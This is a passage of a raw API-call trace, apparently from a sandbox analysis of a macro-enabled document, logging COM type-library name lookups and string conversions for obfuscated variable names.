_Dst=0x144e50, _DstSize=0x10, _Src="_B_var_TAAAQADA" | out: _Dst="_B_var_TAAAQADA") returned 0x0 [0069.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_TAAAQADA") returned 16 [0069.200] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.200] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_TAAAQADA", lHashVal=0x10a51b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.200] IUnknown:Release (This=0x665ba50) returned 0xd [0069.200] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.200] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_TAAAQADA", lHashVal=0x10a51b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.200] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.200] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.200] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_TAAAQADA", lHashVal=0x10a51b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.200] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.200] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.200] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_TAAAQADA", lHashVal=0x10a51b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.200] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.200] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.200] IUnknown:Release (This=0x665ba50) returned 0xd [0069.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1196e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_TAAAQADA") returned 16 [0069.200] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_TAAAQADA", lHashVal=0x10a51b, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0069.200] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62b06 | out: _Dst=0x144ec0) returned 0x0 [0069.200] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZAxQXUx", lHashVal=0x109b01, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZAxQXUx") returned 8 [0069.201] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZAxQXUx", lHashVal=0x109b01, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZAxQXUx") returned 8 [0069.201] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZAxQXUx", lHashVal=0x109b01, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZAxQXUx") returned 0x109b01 [0069.201] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ZAxQXUx" | out: _Dst="ZAxQXUx") returned 0x0 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ZAxQXUx") returned 8 [0069.201] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.201] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZAxQXUx", lHashVal=0x109b01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.201] IUnknown:Release (This=0x665ba50) returned 0xd [0069.201] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.201] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZAxQXUx", lHashVal=0x109b01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.201] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.201] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.201] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZAxQXUx", lHashVal=0x109b01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.201] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.201] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.201] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZAxQXUx", lHashVal=0x109b01, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.201] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.201] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b5a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZAxQXUx") returned 8 [0069.201] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZAxQXUx", lHashVal=0x109b01, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.201] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.201] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62b5a | out: _Dst=0x67c2d40) returned 0x0 [0069.201] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZAxQXUx") returned 0x108f04 [0069.201] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ZAxQXUx" | out: _Dst="_B_var_ZAxQXUx") returned 0x0 [0069.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ZAxQXUx") returned 15 [0069.202] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.202] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZAxQXUx", lHashVal=0x108f04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.202] IUnknown:Release (This=0x665ba50) returned 0xd [0069.202] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.202] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZAxQXUx", lHashVal=0x108f04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.202] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.202] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.202] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZAxQXUx", lHashVal=0x108f04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.202] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.202] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.202] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZAxQXUx", lHashVal=0x108f04, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.202] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.202] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.202] IUnknown:Release (This=0x665ba50) returned 0xd [0069.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1199e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ZAxQXUx") returned 15 [0069.202] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZAxQXUx", lHashVal=0x108f04, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x58005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x58005100000000, pDummy=0x0) returned 0x0 [0069.202] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62b5a | out: _Dst=0x144ec0) returned 0x0 [0069.202] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HDAGXABU", lHashVal=0x105f91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HDAGXABU") returned 9 [0069.202] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HDAGXABU", lHashVal=0x105f91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HDAGXABU") returned 9 [0069.202] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HDAGXABU", lHashVal=0x105f91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.202] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HDAGXABU") returned 0x105f91 [0069.203] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="HDAGXABU" | out: _Dst="HDAGXABU") returned 0x0 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="HDAGXABU") returned 9 [0069.203] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.203] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HDAGXABU", lHashVal=0x105f91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.203] IUnknown:Release (This=0x665ba50) returned 0xd [0069.203] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.203] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HDAGXABU", lHashVal=0x105f91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.203] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.203] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.203] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HDAGXABU", lHashVal=0x105f91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.203] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.203] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.203] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HDAGXABU", lHashVal=0x105f91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.203] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62b82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HDAGXABU") returned 9 [0069.203] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HDAGXABU", lHashVal=0x105f91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.203] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.203] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62b82 | out: _Dst=0x67c2d40) returned 0x0 [0069.203] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HDAGXABU") returned 0x10371a [0069.203] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_HDAGXABU" | out: _Dst="_B_var_HDAGXABU") returned 0x0 [0069.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_HDAGXABU") returned 16 [0069.203] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.203] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HDAGXABU", lHashVal=0x10371a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.203] IUnknown:Release (This=0x665ba50) returned 0xd [0069.203] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.203] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HDAGXABU", lHashVal=0x10371a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.203] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.203] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.203] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HDAGXABU", lHashVal=0x10371a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.204] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.204] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.204] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HDAGXABU", lHashVal=0x10371a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.204] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.204] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.204] IUnknown:Release (This=0x665ba50) returned 0xd [0069.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b119ce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_HDAGXABU") returned 16 [0069.204] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HDAGXABU", lHashVal=0x10371a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x58004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x58004700000000, pDummy=0x0) returned 0x0 [0069.204] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62b82 | out: _Dst=0x144ec0) returned 0x0 [0069.204] ITypeComp:RemoteBind (in: This=0x665ba60, szName="px4GXA", lHashVal=0x10e07a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="px4GXA") returned 7 [0069.204] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="px4GXA", lHashVal=0x10e07a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="px4GXA") returned 7 [0069.204] ITypeComp:RemoteBind (in: This=0x665bd30, szName="px4GXA", lHashVal=0x10e07a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.204] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="px4GXA") returned 0x10e07a [0069.204] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="px4GXA" | out: _Dst="px4GXA") returned 0x0 [0069.204] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="px4GXA") returned 7 [0069.204] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.204] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="px4GXA", lHashVal=0x10e07a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.204] IUnknown:Release (This=0x665ba50) returned 0xd [0069.204] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.204] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="px4GXA", lHashVal=0x10e07a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.205] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.205] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.205] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="px4GXA", lHashVal=0x10e07a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.205] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.205] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.205] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="px4GXA", lHashVal=0x10e07a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.205] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="px4GXA") returned 7 [0069.205] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="px4GXA", lHashVal=0x10e07a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.205] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.205] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62bae | out: _Dst=0x67c2d40) returned 0x0 [0069.205] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_px4GXA") returned 0x105ae4 [0069.205] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_px4GXA" | out: _Dst="_B_var_px4GXA") returned 0x0 [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_px4GXA") returned 14 [0069.205] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.205] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_px4GXA", lHashVal=0x105ae4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.205] IUnknown:Release (This=0x665ba50) returned 0xd [0069.205] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.205] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_px4GXA", lHashVal=0x105ae4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.205] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.205] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.205] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_px4GXA", lHashVal=0x105ae4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.205] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.205] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.205] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_px4GXA", lHashVal=0x105ae4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.205] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.205] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.205] IUnknown:Release (This=0x665ba50) returned 0xd [0069.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b119fe, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_px4GXA") returned 14 [0069.206] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_px4GXA", lHashVal=0x105ae4, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x58004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x58004700000000, pDummy=0x0) returned 0x0 [0069.206] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62bae | out: _Dst=0x144ec0) returned 0x0 [0069.206] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SBo_CAD", lHashVal=0x103624, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bfe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SBo_CAD") returned 8 [0069.206] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SBo_CAD", lHashVal=0x103624, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62bfe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SBo_CAD") returned 8 [0069.206] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SBo_CAD", lHashVal=0x103624, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.206] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SBo_CAD") returned 0x103624 [0069.206] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="SBo_CAD" | out: _Dst="SBo_CAD") returned 0x0 [0069.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="SBo_CAD") returned 8 [0069.206] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.206] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="SBo_CAD", lHashVal=0x103624, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.206] IUnknown:Release (This=0x665ba50) returned 0xd [0069.206] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.206] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="SBo_CAD", lHashVal=0x103624, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.206] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.206] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.206] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="SBo_CAD", 